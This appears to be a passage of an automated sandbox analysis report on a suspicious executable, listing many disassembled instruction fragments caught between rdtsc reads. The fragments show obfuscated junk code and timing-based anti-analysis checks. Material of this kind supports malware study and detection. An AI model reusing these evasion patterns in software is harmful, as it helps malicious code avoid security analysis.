0x0000006b add esi, dword ptr [esp+24h] 0x0000006f sub dword ptr [ebp+122D1CB8h], ecx 0x00000075 lodsw 0x00000077 pushad 0x00000078 add al, 00000060h 0x0000007b movzx eax, bx 0x0000007e popad 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jp 00007F79A547B38Eh 0x00000089 pushad 0x0000008a mov dword ptr [ebp+122D1CAAh], edx 0x00000090 popad 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 jmp 00007F79A547B38Eh 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jmp 00007F79A547B399h 0x000000a2 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51CC1 second address: B51CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51137 second address: B5113D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5113D second address: B51141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51141 second address: B51157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F79A547B386h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51532 second address: B5154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F79A4C9A8EAh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5154A second address: B5154E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5154E second address: B51584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F1h 0x00000007 jmp 00007F79A4C9A8EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 jmp 00007F79A4C9A8EEh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51584 second address: B5158A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5158A second address: B51590 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516DD second address: B516E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516E1 second address: B516E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51B53 second address: B51B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AE5A second address: B5AE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F79A4C9A8E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AE66 second address: B5AE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE23A5 second address: AE23C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F79A4C9A8E6h 0x0000000a jmp 00007F79A4C9A8F4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59960 second address: B59966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD04 second address: B5AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F79A4C9A8EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD1A second address: B5AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B638F7 second address: B63908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63908 second address: B6390E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63DDF second address: B63DF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F79A4C9A8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63DF1 second address: B63DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6445F second address: B64463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2138A second address: B2138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2174E second address: 96EB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F79A4C9A8F0h 0x0000000f push dword ptr [ebp+122D0A9Dh] 0x00000015 mov edi, dword ptr [ebp+122D2CA9h] 0x0000001b call dword ptr [ebp+122D1FBAh] 0x00000021 pushad 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1CA1h], ecx 0x00000029 jno 00007F79A4C9A8EBh 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 jmp 00007F79A4C9A8F6h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b mov dword ptr [ebp+122D1CA1h], edx 0x00000041 mov dword ptr [ebp+122D2E11h], eax 0x00000047 jmp 00007F79A4C9A8EDh 0x0000004c mov esi, 0000003Ch 0x00000051 ja 00007F79A4C9A8F0h 0x00000057 pushad 0x00000058 mov dl, ah 0x0000005a mov ebx, dword ptr [ebp+122D2D1Dh] 0x00000060 popad 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 sub dword ptr [ebp+122D1CB8h], ecx 0x0000006b lodsw 0x0000006d pushad 0x0000006e add al, 00000060h 0x00000071 movzx eax, bx 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jp 00007F79A4C9A8EEh 0x0000007f pushad 0x00000080 mov dword ptr [ebp+122D1CAAh], edx 0x00000086 popad 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007F79A4C9A8EEh 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007F79A4C9A8F9h 0x00000098 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21817 second address: B2185A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F79A547B38Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F79A547B396h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2185A second address: B21864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79A4C9A8E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF34 second address: BCDF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF3A second address: BCDF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F79A547B386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF44 second address: BCDF52 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE35E second address: BCE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE362 second address: BCE37B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F79A4C9A8EAh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE37B second address: BCE382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE382 second address: BCE3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F6h 0x00000009 popad 0x0000000a jmp 00007F79A4C9A8EBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE3AF second address: BCE3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE3B5 second address: BCE3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3A62 second address: BD3A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3769 second address: BD376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD376F second address: BD3775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE26BE second address: BE26C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE4A4 second address: BDE4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE4AA second address: BDE4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF070B second address: BF0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B38Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d je 00007F79A547B386h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 jng 00007F79A547B38Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF089B second address: BF089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06350 second address: C06367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79A547B38Dh 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06367 second address: C063A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E6h 0x00000008 jc 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F79A4C9A8FAh 0x00000016 jmp 00007F79A4C9A8F2h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e jnp 00007F79A4C9A8E6h 0x00000024 jmp 00007F79A4C9A8EEh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2A9 second address: C0A2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2AD second address: C0A2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2B5 second address: C0A2D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A547B39Dh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F79A547B395h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2D8 second address: C0A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F79A4C9A8ECh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2F0 second address: C0A2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F79A547B386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A46D second address: C0A47B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A47B second address: C0A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0AD5F second address: C0AD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0AD67 second address: C0AD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B055 second address: C0B05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B05A second address: C0B077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B393h 0x00000007 jng 00007F79A547B3A1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CBAC second address: C0CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CBB0 second address: C0CBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F79A547B38Bh 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7A3 second address: C0F7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 xor dword ptr [ebp+1247DB1Bh], eax 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F79A4C9A8E8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 adc dx, EE7Ah 0x0000002d push 6BEE4C73h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E0 second address: C0F7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E4 second address: C0F7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E8 second address: C0F7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7EE second address: C0F7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11511 second address: C11517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11517 second address: C1151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1151B second address: C11532 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F79A547B38Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11532 second address: C11536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11045 second address: C11065 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F79A547B397h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11065 second address: C11070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11070 second address: C1107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2547A second address: B2547F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2547F second address: B25485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F02E6 second address: 50F02EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F02EC second address: 50F0333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C9B7h 0x00000007 mov di, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F79A547B396h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop esi 0x0000001c jmp 00007F79A547B399h 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0333 second address: 50F0339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0339 second address: 50F033D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0389 second address: 50F03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8F4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F03A1 second address: 50F03A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203E2 second address: 5120410 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F79A4C9A8F0h 0x00000008 adc cx, 0358h 0x0000000d jmp 00007F79A4C9A8EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120410 second address: 5120414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120414 second address: 512042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512042F second address: 5120454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 call 00007F79A547B390h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120454 second address: 512048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F79A4C9A8F0h 0x0000000f push eax 0x00000010 jmp 00007F79A4C9A8EBh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512048C second address: 51204A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204A7 second address: 51204AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204AE second address: 51204DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jmp 00007F79A547B38Ch 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79A547B397h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204DE second address: 5120508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79A4C9A8F9h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120508 second address: 512050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512050E second address: 5120512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120512 second address: 512058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov edi, 25C0C004h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 pushad 0x00000014 mov bh, 0Bh 0x00000016 jmp 00007F79A547B392h 0x0000001b popad 0x0000001c push dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F79A547B38Dh 0x00000028 and cx, 04A6h 0x0000002d jmp 00007F79A547B391h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F79A547B390h 0x00000039 jmp 00007F79A547B395h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51205BB second address: 51205C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
